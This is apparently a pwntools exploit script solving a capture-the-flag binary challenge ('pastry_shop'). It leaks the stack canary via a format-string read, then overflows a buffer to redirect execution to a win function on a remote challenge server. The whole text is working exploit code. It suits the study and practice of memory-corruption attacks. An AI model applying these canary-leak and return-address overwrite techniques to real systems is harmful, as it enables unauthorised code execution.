#!/usr/bin/env python3
from pwn import *

# elf = context.binary = ELF('./pastry_shop', checksec=False)

# %lx.%lx.%lx.%lx.%lx.%lx.%lx.%lx
CANARY_IDX = 23
OFFSET_TO_CANARY = 72
# Space between canary and RIP
OFFSET_TO_RIP = 88

# p = process(elf.path)
p = remote("offsec.m0lecon.it", 13538)
p.recvuntil(b"dear customer?\n")
p.sendline(f"%{CANARY_IDX}$lx".encode())
leak = p.recvline().strip()
canary = int(leak, 16)
log.info(f"canary = {canary:#x}")
win_addr = 0x00000000004012C2
p.recvuntil(b"to order?\n")

payload = flat(
    b"A" * OFFSET_TO_CANARY,
    p64(canary),
    b"B" * (OFFSET_TO_RIP - OFFSET_TO_CANARY - 8),
    p64(win_addr),
)

p.send(payload)
p.interactive()